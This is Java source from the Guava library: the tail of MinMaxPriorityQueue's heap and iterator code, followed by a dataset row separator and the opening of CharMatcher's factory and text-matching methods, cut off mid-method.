@SuppressWarnings("nullness:initialization.field.uninitialized")
@Weak
Heap otherHeap; // always initialized immediately after construction
Heap(Ordering<E> ordering) {
this.ordering = ordering;
}
int compareElements(int a, int b) {
return ordering.compare(elementData(a), elementData(b));
}
/**
* Tries to move {@code toTrickle} from a min to a max level and bubble up there. If it moved
* before {@code removeIndex} this method returns a pair as described in {@link #removeAt}.
*/
@CheckForNull
MoveDesc<E> tryCrossOverAndBubbleUp(int removeIndex, int vacated, E toTrickle) {
int crossOver = crossOver(vacated, toTrickle);
if (crossOver == vacated) {
return null;
}
// Successfully crossed over from min to max.
// Bubble up max levels.
E parent;
// If toTrickle is moved up to a parent of removeIndex, the parent is
// placed in removeIndex position. We must return that to the iterator so
// that it knows to skip it.
if (crossOver < removeIndex) {
// We crossed over to the parent level in crossOver, so the parent
// has already been moved.
parent = elementData(removeIndex);
} else {
parent = elementData(getParentIndex(removeIndex));
}
// bubble it up the opposite heap
if (otherHeap.bubbleUpAlternatingLevels(crossOver, toTrickle) < removeIndex) {
return new MoveDesc<>(toTrickle, parent);
} else {
return null;
}
}
/** Bubbles a value from {@code index} up the appropriate heap if required. */
void bubbleUp(int index, E x) {
int crossOver = crossOverUp(index, x);
Heap heap;
if (crossOver == index) {
heap = this;
} else {
index = crossOver;
heap = otherHeap;
}
heap.bubbleUpAlternatingLevels(index, x);
}
/**
* Bubbles a value from {@code index} up the levels of this heap, and returns the index the
* element ended up at.
*/
@CanIgnoreReturnValue
int bubbleUpAlternatingLevels(int index, E x) {
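// Note added for clarity: a grandparent is two levels up and therefore belongs to the same
// (min or max) view of the array as this node; indices 0..2 have no grandparent, hence the bound.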
while (index > 2) {
int grandParentIndex = getGrandparentIndex(index);
E e = elementData(grandParentIndex);
if (ordering.compare(e, x) <= 0) {
break;
}
queue[index] = e;
index = grandParentIndex;
}
queue[index] = x;
return index;
}
/**
 * Returns the index of the minimum value between {@code index} and {@code index + len}, or
 * {@code -1} if {@code index} is greater than or equal to {@code size}.
*/
int findMin(int index, int len) {
if (index >= size) {
return -1;
}
checkState(index > 0);
int limit = Math.min(index, size - len) + len;
int minIndex = index;
for (int i = index + 1; i < limit; i++) {
if (compareElements(i, minIndex) < 0) {
minIndex = i;
}
}
return minIndex;
}
/** Returns the minimum child or {@code -1} if no child exists. */
int findMinChild(int index) {
return findMin(getLeftChildIndex(index), 2);
}
/** Returns the minimum grand child or -1 if no grand child exists. */
int findMinGrandChild(int index) {
int leftChildIndex = getLeftChildIndex(index);
if (leftChildIndex < 0) {
return -1;
}
return findMin(getLeftChildIndex(leftChildIndex), 4);
}
/**
* Moves an element one level up from a min level to a max level (or vice versa). Returns the
* new position of the element.
*/
int crossOverUp(int index, E x) {
if (index == 0) {
queue[0] = x;
return 0;
}
int parentIndex = getParentIndex(index);
E parentElement = elementData(parentIndex);
if (parentIndex != 0) {
/*
* This is a guard for the case of the childless aunt node. Since the end of the array is
* actually the middle of the heap, a smaller childless aunt node can become a child of x
* when we bubble up alternate levels, violating the invariant.
*/
int grandparentIndex = getParentIndex(parentIndex);
int auntIndex = getRightChildIndex(grandparentIndex);
if (auntIndex != parentIndex && getLeftChildIndex(auntIndex) >= size) {
E auntElement = elementData(auntIndex);
if (ordering.compare(auntElement, parentElement) < 0) {
parentIndex = auntIndex;
parentElement = auntElement;
}
}
}
if (ordering.compare(parentElement, x) < 0) {
queue[index] = parentElement;
queue[parentIndex] = x;
return parentIndex;
}
queue[index] = x;
return index;
}
// About the term "aunt node": it's better to leave gender out of it, but for this the English
// language has nothing for us. Except for the whimsical neologism "pibling" (!) which we
// obviously could not expect to increase anyone's understanding of the code.
/**
* Swap {@code actualLastElement} with the conceptually correct last element of the heap.
* Returns the index that {@code actualLastElement} now resides in.
*
* <p>Since the last element of the array is actually in the middle of the sorted structure, a
* childless aunt node could be smaller, which would corrupt the invariant if this element
* becomes the new parent of the aunt node. In that case, we first switch the last element with
* its aunt node, before returning.
*/
int swapWithConceptuallyLastElement(E actualLastElement) {
int parentIndex = getParentIndex(size);
if (parentIndex != 0) {
int grandparentIndex = getParentIndex(parentIndex);
int auntIndex = getRightChildIndex(grandparentIndex);
if (auntIndex != parentIndex && getLeftChildIndex(auntIndex) >= size) {
E auntElement = elementData(auntIndex);
if (ordering.compare(auntElement, actualLastElement) < 0) {
queue[auntIndex] = actualLastElement;
queue[size] = auntElement;
return auntIndex;
}
}
}
return size;
}
/**
* Crosses an element over to the opposite heap by moving it one level down (or up if there are
* no elements below it).
*
* <p>Returns the new position of the element.
*/
int crossOver(int index, E x) {
int minChildIndex = findMinChild(index);
// TODO(kevinb): split the && into two if's and move crossOverUp so it's
// only called when there's no child.
if ((minChildIndex > 0) && (ordering.compare(elementData(minChildIndex), x) < 0)) {
queue[index] = elementData(minChildIndex);
queue[minChildIndex] = x;
return minChildIndex;
}
return crossOverUp(index, x);
}
/**
* Fills the hole at {@code index} by moving in the least of its grandchildren to this position,
* then recursively filling the new hole created.
*
* @return the position of the new hole (where the lowest grandchild moved from, that had no
* grandchild to replace it)
*/
int fillHoleAt(int index) {
int minGrandchildIndex;
while ((minGrandchildIndex = findMinGrandChild(index)) > 0) {
queue[index] = elementData(minGrandchildIndex);
index = minGrandchildIndex;
}
return index;
}
private boolean verifyIndex(int i) {
if ((getLeftChildIndex(i) < size) && (compareElements(i, getLeftChildIndex(i)) > 0)) {
return false;
}
if ((getRightChildIndex(i) < size) && (compareElements(i, getRightChildIndex(i)) > 0)) {
return false;
}
if ((i > 0) && (compareElements(i, getParentIndex(i)) > 0)) {
return false;
}
if ((i > 2) && (compareElements(getGrandparentIndex(i), i) > 0)) {
return false;
}
return true;
}
// These would be static if inner classes could have static members.
private int getLeftChildIndex(int i) {
return i * 2 + 1;
}
private int getRightChildIndex(int i) {
return i * 2 + 2;
}
private int getParentIndex(int i) {
return (i - 1) / 2;
}
private int getGrandparentIndex(int i) {
return getParentIndex(getParentIndex(i)); // (i - 3) / 4
}
}
/**
* Iterates the elements of the queue in no particular order.
*
* <p>If the underlying queue is modified during iteration an exception will be thrown.
*/
private class QueueIterator implements Iterator<E> {
private int cursor = -1;
private int nextCursor = -1;
private int expectedModCount = modCount;
// The same element is not allowed in both forgetMeNot and skipMe, but duplicates are allowed in
// either of them, up to the same multiplicity as the queue.
@CheckForNull private Queue<E> forgetMeNot;
@CheckForNull private List<E> skipMe;
@CheckForNull private E lastFromForgetMeNot;
private boolean canRemove;
@Override
public boolean hasNext() {
checkModCount();
nextNotInSkipMe(cursor + 1);
return (nextCursor < size()) || ((forgetMeNot != null) && !forgetMeNot.isEmpty());
}
@Override
public E next() {
checkModCount();
nextNotInSkipMe(cursor + 1);
if (nextCursor < size()) {
cursor = nextCursor;
canRemove = true;
return elementData(cursor);
} else if (forgetMeNot != null) {
cursor = size();
lastFromForgetMeNot = forgetMeNot.poll();
if (lastFromForgetMeNot != null) {
canRemove = true;
return lastFromForgetMeNot;
}
}
throw new NoSuchElementException("iterator moved past last element in queue.");
}
@Override
public void remove() {
checkRemove(canRemove);
checkModCount();
canRemove = false;
expectedModCount++;
if (cursor < size()) {
MoveDesc<E> moved = removeAt(cursor);
if (moved != null) {
// Either both are null or neither is, but we check both to satisfy the nullness checker.
if (forgetMeNot == null || skipMe == null) {
forgetMeNot = new ArrayDeque<>();
skipMe = new ArrayList<>(3);
}
if (!foundAndRemovedExactReference(skipMe, moved.toTrickle)) {
forgetMeNot.add(moved.toTrickle);
}
if (!foundAndRemovedExactReference(forgetMeNot, moved.replaced)) {
skipMe.add(moved.replaced);
}
}
cursor--;
nextCursor--;
} else { // we must have set lastFromForgetMeNot in next()
checkState(removeExact(requireNonNull(lastFromForgetMeNot)));
lastFromForgetMeNot = null;
}
}
/** Returns true if an exact reference (==) was found and removed from the supplied iterable. */
private boolean foundAndRemovedExactReference(Iterable<E> elements, E target) {
for (Iterator<E> it = elements.iterator(); it.hasNext(); ) {
E element = it.next();
if (element == target) {
it.remove();
return true;
}
}
return false;
}
/** Removes only this exact instance, not others that are equals() to it. */
private boolean removeExact(Object target) {
for (int i = 0; i < size; i++) {
if (queue[i] == target) {
removeAt(i);
return true;
}
}
return false;
}
private void checkModCount() {
if (modCount != expectedModCount) {
throw new ConcurrentModificationException();
}
}
/**
 * Advances nextCursor to the index of the first element after {@code c} that is not in {@code
 * skipMe}, setting it to {@code size()} if there is no such element.
*/
private void nextNotInSkipMe(int c) {
if (nextCursor < c) {
if (skipMe != null) {
while (c < size() && foundAndRemovedExactReference(skipMe, elementData(c))) {
c++;
}
}
nextCursor = c;
}
}
}
/**
* Returns an iterator over the elements contained in this collection, <i>in no particular
* order</i>.
*
* <p>The iterator is <i>fail-fast</i>: If the MinMaxPriorityQueue is modified at any time after
* the iterator is created, in any way except through the iterator's own remove method, the
* iterator will generally throw a {@link ConcurrentModificationException}. Thus, in the face of
* concurrent modification, the iterator fails quickly and cleanly, rather than risking arbitrary,
* non-deterministic behavior at an undetermined time in the future.
*
* <p>Note that the fail-fast behavior of an iterator cannot be guaranteed as it is, generally
* speaking, impossible to make any hard guarantees in the presence of unsynchronized concurrent
* modification. Fail-fast iterators throw {@code ConcurrentModificationException} on a
* best-effort basis. Therefore, it would be wrong to write a program that depended on this
* exception for its correctness: <i>the fail-fast behavior of iterators should be used only to
* detect bugs.</i>
*
* @return an iterator over the elements contained in this collection
*/
@Override
public Iterator<E> iterator() {
return new QueueIterator();
}
@Override
public void clear() {
for (int i = 0; i < size; i++) {
queue[i] = null;
}
size = 0;
}
@Override
@J2ktIncompatible // Incompatible return type change. Use inherited (unoptimized) implementation
public Object[] toArray() {
Object[] copyTo = new Object[size];
System.arraycopy(queue, 0, copyTo, 0, size);
return copyTo;
}
/**
* Returns the comparator used to order the elements in this queue. Obeys the general contract of
* {@link PriorityQueue#comparator}, but returns {@link Ordering#natural} instead of {@code null}
* to indicate natural ordering.
*/
public Comparator<? super E> comparator() {
return minHeap.ordering;
}
@VisibleForTesting
int capacity() {
return queue.length;
}
// Size/capacity-related methods
private static final int DEFAULT_CAPACITY = 11;
@VisibleForTesting
static int initialQueueSize(
int configuredExpectedSize, int maximumSize, Iterable<?> initialContents) {
// Start with what they said, if they said it, otherwise DEFAULT_CAPACITY
int result =
(configuredExpectedSize == Builder.UNSET_EXPECTED_SIZE)
? DEFAULT_CAPACITY
: configuredExpectedSize;
// Enlarge to contain initial contents
if (initialContents instanceof Collection) {
int initialSize = ((Collection<?>) initialContents).size();
result = Math.max(result, initialSize);
}
// Now cap it at maxSize + 1
return capAtMaximumSize(result, maximumSize);
}
private void growIfNeeded() {
if (size > queue.length) {
int newCapacity = calculateNewCapacity();
Object[] newQueue = new Object[newCapacity];
System.arraycopy(queue, 0, newQueue, 0, queue.length);
queue = newQueue;
}
}
/** Returns ~2x the old capacity if small; ~1.5x otherwise. */
private int calculateNewCapacity() {
int oldCapacity = queue.length;
int newCapacity =
(oldCapacity < 64) ? (oldCapacity + 1) * 2 : IntMath.checkedMultiply(oldCapacity / 2, 3);
return capAtMaximumSize(newCapacity, maximumSize);
}
/** There's no reason for the queueSize to ever be more than maximumSize + 1. */
private static int capAtMaximumSize(int queueSize, int maximumSize) {
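// Note added for clarity: this is min(queueSize, maximumSize + 1) rewritten so the addition cannot
// overflow when maximumSize == Integer.MAX_VALUE.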
return Math.min(queueSize - 1, maximumSize) + 1; // don't overflow
}
}
| google/guava | android/guava/src/com/google/common/collect/MinMaxPriorityQueue.java |
1,164 | /*
* Copyright (C) 2008 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
package com.google.common.base;
import static com.google.common.base.Preconditions.checkArgument;
import static com.google.common.base.Preconditions.checkNotNull;
import static com.google.common.base.Preconditions.checkPositionIndex;
import com.google.common.annotations.GwtCompatible;
import com.google.common.annotations.GwtIncompatible;
import com.google.common.annotations.VisibleForTesting;
import java.util.Arrays;
import java.util.BitSet;
/**
* Determines a true or false value for any Java {@code char} value, just as {@link Predicate} does
* for any {@link Object}. Also offers basic text processing methods based on this function.
* Implementations are strongly encouraged to be side-effect-free and immutable.
*
* <p>Throughout the documentation of this class, the phrase "matching character" is used to mean
* "any {@code char} value {@code c} for which {@code this.matches(c)} returns {@code true}".
*
* <p><b>Warning:</b> This class deals only with {@code char} values, that is, <a
* href="http://www.unicode.org/glossary/#BMP_character">BMP characters</a>. It does not understand
* <a href="http://www.unicode.org/glossary/#supplementary_code_point">supplementary Unicode code
* points</a> in the range {@code 0x10000} to {@code 0x10FFFF} which includes the majority of
* assigned characters, including important CJK characters and emoji.
*
* <p>Supplementary characters are <a
* href="https://docs.oracle.com/javase/8/docs/api/java/lang/Character.html#supplementary">encoded
* into a {@code String} using surrogate pairs</a>, and a {@code CharMatcher} treats these just as
* two separate characters. {@link #countIn} counts each supplementary character as 2 {@code char}s.
*
* <p>For up-to-date Unicode character properties (digit, letter, etc.) and support for
* supplementary code points, use ICU4J UCharacter and UnicodeSet (freeze() after building). For
* basic text processing based on UnicodeSet use the ICU4J UnicodeSetSpanner.
*
* <p>Example usages:
*
* <pre>
* String trimmed = {@link #whitespace() whitespace()}.{@link #trimFrom trimFrom}(userInput);
* if ({@link #ascii() ascii()}.{@link #matchesAllOf matchesAllOf}(s)) { ... }</pre>
*
* <p>See the Guava User Guide article on <a
* href="https://github.com/google/guava/wiki/StringsExplained#charmatcher">{@code CharMatcher}
* </a>.
*
* @author Kevin Bourrillion
* @since 1.0
*/
@GwtCompatible(emulated = true)
@ElementTypesAreNonnullByDefault
public abstract class CharMatcher implements Predicate<Character> {
/*
* N777777777NO
* N7777777777777N
* M777777777777777N
* $N877777777D77777M
* N M77777777ONND777M
* MN777777777NN D777
* N7ZN777777777NN ~M7778
* N777777777777MMNN88777N
* N777777777777MNZZZ7777O
* DZN7777O77777777777777
* N7OONND7777777D77777N
* 8$M++++?N???$77777$
* M7++++N+M77777777N
* N77O777777777777$ M
* DNNM$$$$777777N D
* N$N:=N$777N7777M NZ
* 77Z::::N777777777 ODZZZ
* 77N::::::N77777777M NNZZZ$
* $777:::::::77777777MN ZM8ZZZZZ
* 777M::::::Z7777777Z77 N++ZZZZNN
* 7777M:::::M7777777$777M $++IZZZZM
* M777$:::::N777777$M7777M +++++ZZZDN
* NN$::::::7777$$M777777N N+++ZZZZNZ
* N::::::N:7$O:77777777 N++++ZZZZN
* M::::::::::::N77777777+ +?+++++ZZZM
* 8::::::::::::D77777777M O+++++ZZ
* ::::::::::::M777777777N O+?D
* M:::::::::::M77777777778 77=
* D=::::::::::N7777777777N 777
* INN===::::::=77777777777N I777N
* ?777N========N7777777777787M N7777
* 77777$D======N77777777777N777N? N777777
* I77777$$$N7===M$$77777777$77777777$MMZ77777777N
* $$$$$$$$$$$NIZN$$$$$$$$$M$$7777777777777777ON
* M$$$$$$$$M M$$$$$$$$N=N$$$$7777777$$$ND
* O77Z$$$$$$$ M$$$$$$$$MNI==$DNNNNM=~N
* 7 :N MNN$$$$M$ $$$777$8 8D8I
* NMM.:7O 777777778
* 7777777MN
* M NO .7:
* M : M
* 8
*/
// Constant matcher factory methods
/**
* Matches any character.
*
* @since 19.0 (since 1.0 as constant {@code ANY})
*/
public static CharMatcher any() {
return Any.INSTANCE;
}
/**
* Matches no characters.
*
* @since 19.0 (since 1.0 as constant {@code NONE})
*/
public static CharMatcher none() {
return None.INSTANCE;
}
/**
* Determines whether a character is whitespace according to the latest Unicode standard, as
* illustrated <a
* href="http://unicode.org/cldr/utility/list-unicodeset.jsp?a=%5Cp%7Bwhitespace%7D">here</a>.
* This is not the same definition used by other Java APIs. (See a <a
* href="https://goo.gl/Y6SLWx">comparison of several definitions of "whitespace"</a>.)
*
* <p>All Unicode White_Space characters are on the BMP and thus supported by this API.
*
* <p><b>Note:</b> as the Unicode definition evolves, we will modify this matcher to keep it up to
* date.
*
* @since 19.0 (since 1.0 as constant {@code WHITESPACE})
*/
public static CharMatcher whitespace() {
return Whitespace.INSTANCE;
}
/**
* Determines whether a character is a breaking whitespace (that is, a whitespace which can be
* interpreted as a break between words for formatting purposes). See {@link #whitespace()} for a
* discussion of that term.
*
* @since 19.0 (since 2.0 as constant {@code BREAKING_WHITESPACE})
*/
public static CharMatcher breakingWhitespace() {
return BreakingWhitespace.INSTANCE;
}
/**
* Determines whether a character is ASCII, meaning that its code point is less than 128.
*
* @since 19.0 (since 1.0 as constant {@code ASCII})
*/
public static CharMatcher ascii() {
return Ascii.INSTANCE;
}
/**
* Determines whether a character is a BMP digit according to <a
* href="http://unicode.org/cldr/utility/list-unicodeset.jsp?a=%5Cp%7Bdigit%7D">Unicode</a>. If
* you only care to match ASCII digits, you can use {@code inRange('0', '9')}.
*
* @deprecated Many digits are supplementary characters; see the class documentation.
* @since 19.0 (since 1.0 as constant {@code DIGIT})
*/
@Deprecated
public static CharMatcher digit() {
return Digit.INSTANCE;
}
/**
* Determines whether a character is a BMP digit according to {@linkplain Character#isDigit(char)
* Java's definition}. If you only care to match ASCII digits, you can use {@code inRange('0',
* '9')}.
*
* @deprecated Many digits are supplementary characters; see the class documentation.
* @since 19.0 (since 1.0 as constant {@code JAVA_DIGIT})
*/
@Deprecated
public static CharMatcher javaDigit() {
return JavaDigit.INSTANCE;
}
/**
* Determines whether a character is a BMP letter according to {@linkplain
* Character#isLetter(char) Java's definition}. If you only care to match letters of the Latin
* alphabet, you can use {@code inRange('a', 'z').or(inRange('A', 'Z'))}.
*
* @deprecated Most letters are supplementary characters; see the class documentation.
* @since 19.0 (since 1.0 as constant {@code JAVA_LETTER})
*/
@Deprecated
public static CharMatcher javaLetter() {
return JavaLetter.INSTANCE;
}
/**
* Determines whether a character is a BMP letter or digit according to {@linkplain
* Character#isLetterOrDigit(char) Java's definition}.
*
* @deprecated Most letters and digits are supplementary characters; see the class documentation.
* @since 19.0 (since 1.0 as constant {@code JAVA_LETTER_OR_DIGIT}).
*/
@Deprecated
public static CharMatcher javaLetterOrDigit() {
return JavaLetterOrDigit.INSTANCE;
}
/**
* Determines whether a BMP character is upper case according to {@linkplain
* Character#isUpperCase(char) Java's definition}.
*
* @deprecated Some uppercase characters are supplementary characters; see the class
* documentation.
* @since 19.0 (since 1.0 as constant {@code JAVA_UPPER_CASE})
*/
@Deprecated
public static CharMatcher javaUpperCase() {
return JavaUpperCase.INSTANCE;
}
/**
* Determines whether a BMP character is lower case according to {@linkplain
* Character#isLowerCase(char) Java's definition}.
*
* @deprecated Some lowercase characters are supplementary characters; see the class
* documentation.
* @since 19.0 (since 1.0 as constant {@code JAVA_LOWER_CASE})
*/
@Deprecated
public static CharMatcher javaLowerCase() {
return JavaLowerCase.INSTANCE;
}
/**
* Determines whether a character is an ISO control character as specified by {@link
* Character#isISOControl(char)}.
*
* <p>All ISO control codes are on the BMP and thus supported by this API.
*
* @since 19.0 (since 1.0 as constant {@code JAVA_ISO_CONTROL})
*/
public static CharMatcher javaIsoControl() {
return JavaIsoControl.INSTANCE;
}
/**
* Determines whether a character is invisible; that is, if its Unicode category is any of
* SPACE_SEPARATOR, LINE_SEPARATOR, PARAGRAPH_SEPARATOR, CONTROL, FORMAT, SURROGATE, and
* PRIVATE_USE according to ICU4J.
*
* <p>See also the Unicode Default_Ignorable_Code_Point property (available via ICU).
*
* @deprecated Most invisible characters are supplementary characters; see the class
* documentation.
* @since 19.0 (since 1.0 as constant {@code INVISIBLE})
*/
@Deprecated
public static CharMatcher invisible() {
return Invisible.INSTANCE;
}
/**
* Determines whether a character is single-width (not double-width). When in doubt, this matcher
* errs on the side of returning {@code false} (that is, it tends to assume a character is
* double-width).
*
* <p><b>Note:</b> as the reference file evolves, we will modify this matcher to keep it up to
* date.
*
* <p>See also <a href="http://www.unicode.org/reports/tr11/">UAX #11 East Asian Width</a>.
*
* @deprecated Many such characters are supplementary characters; see the class documentation.
* @since 19.0 (since 1.0 as constant {@code SINGLE_WIDTH})
*/
@Deprecated
public static CharMatcher singleWidth() {
return SingleWidth.INSTANCE;
}
// Static factories
/** Returns a {@code char} matcher that matches only one specified BMP character. */
public static CharMatcher is(final char match) {
return new Is(match);
}
/**
* Returns a {@code char} matcher that matches any character except the BMP character specified.
*
* <p>To negate another {@code CharMatcher}, use {@link #negate()}.
*/
public static CharMatcher isNot(final char match) {
return new IsNot(match);
}
/**
* Returns a {@code char} matcher that matches any BMP character present in the given character
* sequence. Returns a bogus matcher if the sequence contains supplementary characters.
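 *
 * <p>For example (illustrative), {@code CharMatcher.anyOf("aeiou")} matches any lowercase English
 * vowel.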
*/
public static CharMatcher anyOf(final CharSequence sequence) {
switch (sequence.length()) {
case 0:
return none();
case 1:
return is(sequence.charAt(0));
case 2:
return isEither(sequence.charAt(0), sequence.charAt(1));
default:
// TODO(lowasser): is it potentially worth just going ahead and building a precomputed
// matcher?
return new AnyOf(sequence);
}
}
/**
* Returns a {@code char} matcher that matches any BMP character not present in the given
* character sequence. Returns a bogus matcher if the sequence contains supplementary characters.
*/
public static CharMatcher noneOf(CharSequence sequence) {
return anyOf(sequence).negate();
}
/**
* Returns a {@code char} matcher that matches any character in a given BMP range (both endpoints
* are inclusive). For example, to match any lowercase letter of the English alphabet, use {@code
* CharMatcher.inRange('a', 'z')}.
*
* @throws IllegalArgumentException if {@code endInclusive < startInclusive}
*/
public static CharMatcher inRange(final char startInclusive, final char endInclusive) {
return new InRange(startInclusive, endInclusive);
}
/**
* Returns a matcher with identical behavior to the given {@link Character}-based predicate, but
* which operates on primitive {@code char} instances instead.
*/
public static CharMatcher forPredicate(final Predicate<? super Character> predicate) {
return predicate instanceof CharMatcher ? (CharMatcher) predicate : new ForPredicate(predicate);
}
// Constructors
/**
* Constructor for use by subclasses. When subclassing, you may want to override {@code
* toString()} to provide a useful description.
*/
protected CharMatcher() {}
// Abstract methods
/** Determines a true or false value for the given character. */
public abstract boolean matches(char c);
// Non-static factories
/** Returns a matcher that matches any character not matched by this matcher. */
// @Override under Java 8 but not under Java 7
public CharMatcher negate() {
return new Negated(this);
}
/**
* Returns a matcher that matches any character matched by both this matcher and {@code other}.
*/
public CharMatcher and(CharMatcher other) {
return new And(this, other);
}
/**
* Returns a matcher that matches any character matched by either this matcher or {@code other}.
*/
public CharMatcher or(CharMatcher other) {
return new Or(this, other);
}
/**
* Returns a {@code char} matcher functionally equivalent to this one, but which may be faster to
* query than the original; your mileage may vary. Precomputation takes time and is likely to be
* worthwhile only if the precomputed matcher is queried many thousands of times.
*
* <p>This method has no effect (returns {@code this}) when called in GWT: it's unclear whether a
* precomputed matcher is faster, but it certainly consumes more memory, which doesn't seem like a
* worthwhile tradeoff in a browser.
*/
public CharMatcher precomputed() {
return Platform.precomputeCharMatcher(this);
}
private static final int DISTINCT_CHARS = Character.MAX_VALUE - Character.MIN_VALUE + 1;
/**
* This is the actual implementation of {@link #precomputed}, but we bounce calls through a method
* on {@link Platform} so that we can have different behavior in GWT.
*
* <p>This implementation tries to be smart in a number of ways. It recognizes cases where the
* negation is cheaper to precompute than the matcher itself; it tries to build small hash tables
* for matchers that only match a few characters, and so on. In the worst-case scenario, it
* constructs an eight-kilobyte bit array and queries that. In many situations this produces a
* matcher which is faster to query than the original.
*/
@GwtIncompatible // SmallCharMatcher
CharMatcher precomputedInternal() {
final BitSet table = new BitSet();
setBits(table);
int totalCharacters = table.cardinality();
if (totalCharacters * 2 <= DISTINCT_CHARS) {
return precomputedPositive(totalCharacters, table, toString());
} else {
// TODO(lowasser): is it worth it to worry about the last character of large matchers?
table.flip(Character.MIN_VALUE, Character.MAX_VALUE + 1);
int negatedCharacters = DISTINCT_CHARS - totalCharacters;
String suffix = ".negate()";
final String description = toString();
String negatedDescription =
description.endsWith(suffix)
? description.substring(0, description.length() - suffix.length())
: description + suffix;
return new NegatedFastMatcher(
precomputedPositive(negatedCharacters, table, negatedDescription)) {
@Override
public String toString() {
return description;
}
};
}
}
/**
* Helper method for {@link #precomputedInternal} that doesn't test if the negation is cheaper.
*/
@GwtIncompatible // SmallCharMatcher
private static CharMatcher precomputedPositive(
int totalCharacters, BitSet table, String description) {
switch (totalCharacters) {
case 0:
return none();
case 1:
return is((char) table.nextSetBit(0));
case 2:
char c1 = (char) table.nextSetBit(0);
char c2 = (char) table.nextSetBit(c1 + 1);
return isEither(c1, c2);
default:
return isSmall(totalCharacters, table.length())
? SmallCharMatcher.from(table, description)
: new BitSetMatcher(table, description);
}
}
@GwtIncompatible // SmallCharMatcher
private static boolean isSmall(int totalCharacters, int tableLength) {
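// Heuristic, as added commentary: prefer the hash-based SmallCharMatcher only when the matched set
// is both small and sparse, i.e. when the bit table would have to span a range more than
// 4 * Character.SIZE (64) times larger than the number of matched characters; otherwise the
// eight-kilobyte BitSetMatcher is the better trade-off.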
return totalCharacters <= SmallCharMatcher.MAX_SIZE
&& tableLength > (totalCharacters * 4 * Character.SIZE);
// err on the side of BitSetMatcher
}
/** Sets bits in {@code table} matched by this matcher. */
@GwtIncompatible // used only from other GwtIncompatible code
void setBits(BitSet table) {
for (int c = Character.MAX_VALUE; c >= Character.MIN_VALUE; c--) {
if (matches((char) c)) {
table.set(c);
}
}
}
// Text processing routines
/**
* Returns {@code true} if a character sequence contains at least one matching BMP character.
* Equivalent to {@code !matchesNoneOf(sequence)}.
*
* <p>The default implementation iterates over the sequence, invoking {@link #matches} for each
* character, until this returns {@code true} or the end is reached.
*
* @param sequence the character sequence to examine, possibly empty
* @return {@code true} if this matcher matches at least one character in the sequence
* @since 8.0
*/
public boolean matchesAnyOf(CharSequence sequence) {
return !matchesNoneOf(sequence);
}
/**
* Returns {@code true} if a character sequence contains only matching BMP characters.
*
* <p>The default implementation iterates over the sequence, invoking {@link #matches} for each
* character, until this returns {@code false} or the end is reached.
*
* @param sequence the character sequence to examine, possibly empty
* @return {@code true} if this matcher matches every character in the sequence, including when
* the sequence is empty
*/
public boolean matchesAllOf(CharSequence sequence) {
for (int i = sequence.length() - 1; i >= 0; i--) {
if (!matches(sequence.charAt(i))) {
return false;
}
}
return true;
}
/**
* Returns {@code true} if a character sequence contains no matching BMP characters. Equivalent to
* {@code !matchesAnyOf(sequence)}.
*
* <p>The default implementation iterates over the sequence, invoking {@link #matches} for each
* character, until this returns {@code true} or the end is reached.
*
* @param sequence the character sequence to examine, possibly empty
* @return {@code true} if this matcher matches no characters in the sequence, including when the
* sequence is empty
*/
public boolean matchesNoneOf(CharSequence sequence) {
return indexIn(sequence) == -1;
}
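  // Illustrative examples (not part of the original source), assuming standard CharMatcher behavior:
  //   CharMatcher.anyOf("aeiou").matchesAnyOf("gray");  // true  ('a' matches)
  //   CharMatcher.anyOf("aeiou").matchesAllOf("gray");  // false ('g', 'r', 'y' do not match)
  //   CharMatcher.anyOf("aeiou").matchesNoneOf("gray"); // false (at least one character matches)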
/**
* Returns the index of the first matching BMP character in a character sequence, or {@code -1} if
* no matching character is present.
*
* <p>The default implementation iterates over the sequence in forward order calling {@link
* #matches} for each character.
*
* @param sequence the character sequence to examine from the beginning
* @return an index, or {@code -1} if no character matches
*/
public int indexIn(CharSequence sequence) {
return indexIn(sequence, 0);
}
/**
* Returns the index of the first matching BMP character in a character sequence, starting from a
* given position, or {@code -1} if no character matches after that position.
*
* <p>The default implementation iterates over the sequence in forward order, beginning at {@code
* start}, calling {@link #matches} for each character.
*
* @param sequence the character sequence to examine
* @param start the first index to examine; must be nonnegative and no greater than {@code
* sequence.length()}
* @return the index of the first matching character, guaranteed to be no less than {@code start},
* or {@code -1} if no character matches
* @throws IndexOutOfBoundsException if start is negative or greater than {@code
* sequence.length()}
*/
public int indexIn(CharSequence sequence, int start) {
int length = sequence.length();
checkPositionIndex(start, length);
for (int i = start; i < length; i++) {
if (matches(sequence.charAt(i))) {
return i;
}
}
return -1;
}
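  // Illustrative examples (not part of the original source), assuming standard CharMatcher behavior:
  //   CharMatcher.is('a').indexIn("banana");    // 1, the first 'a'
  //   CharMatcher.is('a').indexIn("banana", 2); // 3, the first 'a' at or after index 2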
/**
* Returns the index of the last matching BMP character in a character sequence, or {@code -1} if
* no matching character is present.
*
* <p>The default implementation iterates over the sequence in reverse order calling {@link
* #matches} for each character.
*
* @param sequence the character sequence to examine from the end
* @return an index, or {@code -1} if no character matches
*/
public int lastIndexIn(CharSequence sequence) {
for (int i = sequence.length() - 1; i >= 0; i--) {
if (matches(sequence.charAt(i))) {
return i;
}
}
return -1;
}
/**
* Returns the number of matching {@code char}s found in a character sequence.
*
* <p>Counts 2 per supplementary character, such as for {@link #whitespace}().{@link #negate}().
*/
public int countIn(CharSequence sequence) {
int count = 0;
for (int i = 0; i < sequence.length(); i++) {
if (matches(sequence.charAt(i))) {
count++;
}
}
return count;
}
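  // Illustrative note (not part of the original source): a supplementary code point is stored as two
  // surrogate chars, so a matcher that matches both surrogates counts it twice. For instance, assuming
  // standard behavior, CharMatcher.whitespace().negate().countIn("😀") returns 2 for the single emoji.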
/**
* Returns a string containing all non-matching characters of a character sequence, in order. For
* example:
*
* <pre>{@code
* CharMatcher.is('a').removeFrom("bazaar")
* }</pre>
*
* ... returns {@code "bzr"}.
*/
public String removeFrom(CharSequence sequence) {
String string = sequence.toString();
int pos = indexIn(string);
if (pos == -1) {
return string;
}
char[] chars = string.toCharArray();
int spread = 1;
// This unusual loop comes from extensive benchmarking
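    // (Clarifying note, not in the original source: `spread` counts how many matching characters
    // have been removed so far; each kept character is shifted left by `spread` positions, so the
    // result length is the original length minus the number of removed characters.)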
OUT:
while (true) {
pos++;
while (true) {
